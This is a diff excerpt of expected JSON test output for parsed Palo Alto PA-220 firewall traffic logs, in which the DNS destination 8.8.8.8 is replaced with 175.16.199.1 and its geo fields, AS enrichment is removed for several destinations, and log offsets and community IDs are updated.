@@ -9222,12 +9010,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24276", - "panw.panos.network.nat.community_id": "1:eIIc+AXkJtZLyfNqUAVZLumaYVQ=", + "panw.panos.network.nat.community_id": "1:MBYdQDSxHvBa6iAwYROKM5oT9cM=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091195, "panw.panos.source.interface": "ethernet1/2", @@ -9242,14 +9030,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 96, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -9275,17 +9063,7 @@ "client.packets": 8, "client.port": 52497, "destination.address": "50.19.85.24", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 654, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "50.19.85.24", "destination.nat.ip": "50.19.85.24", "destination.nat.port": 443, @@ -9313,7 +9091,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 38911, + "log.offset": 39431, "network.application": "ssl", "network.bytes": 1754, "network.community_id": [ 
@@ -9388,17 +9166,7 @@ "client.packets": 8, "client.port": 52498, "destination.address": "50.19.85.24", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 654, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "50.19.85.24", "destination.nat.ip": "50.19.85.24", "destination.nat.port": 443, @@ -9426,7 +9194,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 39403, + "log.offset": 39923, "network.application": "ssl", "network.bytes": 1754, "network.community_id": [ @@ -9501,17 +9269,7 @@ "client.packets": 8, "client.port": 52496, "destination.address": "50.19.85.24", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 654, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "50.19.85.24", "destination.nat.ip": "50.19.85.24", "destination.nat.port": 443, @@ -9539,7 +9297,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 39895, + "log.offset": 40415, "network.application": "ssl", "network.bytes": 1754, "network.community_id": [ 
@@ -9614,14 +9372,7 @@ "client.packets": 12, "client.port": 52510, "destination.address": "104.254.150.9", - "destination.as.number": 29990, - "destination.as.organization.name": "AppNexus, Inc", "destination.bytes": 7820, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "104.254.150.9", "destination.nat.ip": "104.254.150.9", "destination.nat.port": 443, @@ -9649,7 +9400,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 40387, + "log.offset": 40907, "network.application": "ssl", "network.bytes": 10511, "network.community_id": [ @@ -9724,17 +9475,7 @@ "client.packets": 8, "client.port": 52495, "destination.address": "50.19.85.24", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 654, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "50.19.85.24", "destination.nat.ip": "50.19.85.24", "destination.nat.port": 443, @@ -9762,7 +9503,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 40885, + "log.offset": 41405, "network.application": "ssl", "network.bytes": 1754, "network.community_id": [ 
@@ -9837,17 +9578,7 @@ "client.packets": 4, "client.port": 52486, "destination.address": "52.0.218.108", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 214, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "52.0.218.108", "destination.nat.ip": "52.0.218.108", "destination.nat.port": 443, @@ -9875,7 +9606,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 41376, + "log.offset": 41896, "network.application": "incomplete", "network.bytes": 490, "network.community_id": [ @@ -9950,17 +9681,7 @@ "client.packets": 4, "client.port": 52489, "destination.address": "52.6.117.19", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 214, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "52.6.117.19", "destination.nat.ip": "52.6.117.19", "destination.nat.port": 443, @@ -9988,7 +9709,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 41845, + "log.offset": 42365, "network.application": "incomplete", "network.bytes": 490, "network.community_id": [ 
@@ -10063,17 +9784,7 @@ "client.packets": 4, "client.port": 52490, "destination.address": "34.238.96.22", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 214, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "34.238.96.22", "destination.nat.ip": "34.238.96.22", "destination.nat.port": 443, @@ -10101,7 +9812,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 42312, + "log.offset": 42832, "network.application": "incomplete", "network.bytes": 490, "network.community_id": [ @@ -10176,17 +9887,7 @@ "client.packets": 4, "client.port": 52493, "destination.address": "130.211.47.17", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 280, - "destination.geo.city_name": "Mountain View", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.4043, - "destination.geo.location.lon": -122.0748, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "130.211.47.17", "destination.nat.ip": "130.211.47.17", "destination.nat.port": 443, @@ -10214,7 +9915,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 42781, + "log.offset": 43301, "network.application": "incomplete", "network.bytes": 556, "network.community_id": [ 
@@ -10288,17 +9989,18 @@ "client.nat.port": 13490, "client.packets": 1, "client.port": 59320, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 172, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -10312,7 +10014,7 @@ "event.end": "2018-11-30T16:09:18.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:18.000-02:00", "event.timezone": "-02:00", @@ -10324,12 +10026,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 43252, + "log.offset": 43772, "network.application": "dns", "network.bytes": 269, "network.community_id": [ - "1:5G+JVi/ClM/MfHhUL//vH/GmuaA=", - "1:n/IZF37E/7cErtK4po3ewuEQScY=" + "1:iFOe1PdUY9r8dwKaxQH+8rrvnAI=", + "1:zJk1JtAystoTBaVlRntBCcIln4Q=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -10346,12 +10048,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24281", - "panw.panos.network.nat.community_id": "1:5G+JVi/ClM/MfHhUL//vH/GmuaA=", + "panw.panos.network.nat.community_id": "1:iFOe1PdUY9r8dwKaxQH+8rrvnAI=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091205, "panw.panos.source.interface": "ethernet1/2", @@ -10366,14 +10068,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 172, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -10398,17 +10100,18 @@ "client.nat.port": 0, "client.packets": 6, "client.port": 0, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 588, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 6, "destination.port": 0, 
@@ -10422,7 +10125,7 @@ "event.end": "2018-11-30T16:09:37.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:37.000-02:00", "event.timezone": "-02:00", @@ -10434,12 +10137,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 43701, + "log.offset": 44231, "network.application": "ping", "network.bytes": 1176, "network.community_id": [ - "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", - "1:iNhLzwoKKarTKCq59Sts/hhZN7Q=" + "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", + "1:P75WlJ7hfYMGDrg11tgcwQhxoAI=" ], "network.direction": "outbound", "network.packets": 12, 
@@ -10456,12 +10159,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 0, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24424", - "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", + "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091206, "panw.panos.source.interface": "ethernet1/2", @@ -10476,14 +10179,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 6, "server.port": 0, 
@@ -10508,17 +10211,18 @@ "client.nat.port": 53751, "client.packets": 1, "client.port": 13076, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 94, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -10532,7 +10236,7 @@ "event.end": "2018-11-30T16:09:19.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:19.000-02:00", "event.timezone": "-02:00", @@ -10544,12 +10248,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 44145, + "log.offset": 44685, "network.application": "dns", "network.bytes": 172, "network.community_id": [ - "1:jKueIOIhkRRjHQyRO93QyuKEiP8=", - "1:mdksC4jGw6MN7g3nGdquiqQ95vU=" + "1:+EKGNDzaa2Gmys4Gdwo/EIwHp2s=", + "1:80NRQY9qT1RcwPXjJAnXbR/Cnx8=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -10566,12 +10270,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24230", - "panw.panos.network.nat.community_id": "1:mdksC4jGw6MN7g3nGdquiqQ95vU=", + "panw.panos.network.nat.community_id": "1:80NRQY9qT1RcwPXjJAnXbR/Cnx8=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091207, "panw.panos.source.interface": "ethernet1/2", @@ -10586,14 +10290,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 94, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -10618,17 +10322,18 @@ "client.nat.port": 21643, "client.packets": 1, "client.port": 5511, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 170, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -10642,7 +10347,7 @@ "event.end": "2018-11-30T16:09:19.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:19.000-02:00", "event.timezone": "-02:00", @@ -10654,12 +10359,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 44593, + "log.offset": 45143, "network.application": "dns", "network.bytes": 242, "network.community_id": [ - "1:+zC2Y+UE7UqApr01oqb755Xyuf4=", - "1:mci4o+GZJDLvZr11UdJH9bepPqU=" + "1:4RiaH+n0JwxG6zcL26BuXxb9VkY=", + "1:tMlsHUEsYDQ3Vv3JAJSu15cqkNE=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -10676,12 +10381,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24243", - "panw.panos.network.nat.community_id": "1:+zC2Y+UE7UqApr01oqb755Xyuf4=", + "panw.panos.network.nat.community_id": "1:tMlsHUEsYDQ3Vv3JAJSu15cqkNE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091208, "panw.panos.source.interface": "ethernet1/2", @@ -10696,14 +10401,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 170, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -10728,17 +10433,18 @@ "client.nat.port": 22446, "client.packets": 1, "client.port": 9799, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 94, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -10752,7 +10458,7 @@ "event.end": "2018-11-30T16:09:19.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:19.000-02:00", "event.timezone": "-02:00", @@ -10764,12 +10470,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 45041, + "log.offset": 45601, "network.application": "dns", "network.bytes": 172, "network.community_id": [ - "1:Px8uRfOgVDuaWj/VKxjTwyAzHAM=", - "1:xawqUBgLyfe1E61ObEXv4nbO590=" + "1:IyD4gx5qjpc1VEbcmilQaH5vo9E=", + "1:NmuHySRLQ/6iGfMvm+qs/a2Nrpc=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -10786,12 +10492,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24077",
- "panw.panos.network.nat.community_id": "1:xawqUBgLyfe1E61ObEXv4nbO590=",
+ "panw.panos.network.nat.community_id": "1:NmuHySRLQ/6iGfMvm+qs/a2Nrpc=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091209,
 "panw.panos.source.interface": "ethernet1/2",
@@ -10806,14 +10512,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 94,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -10838,17 +10544,18 @@
 "client.nat.port": 22301,
 "client.packets": 1,
 "client.port": 39169,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 94,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -10862,7 +10569,7 @@
 "event.end": "2018-11-30T16:09:19.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
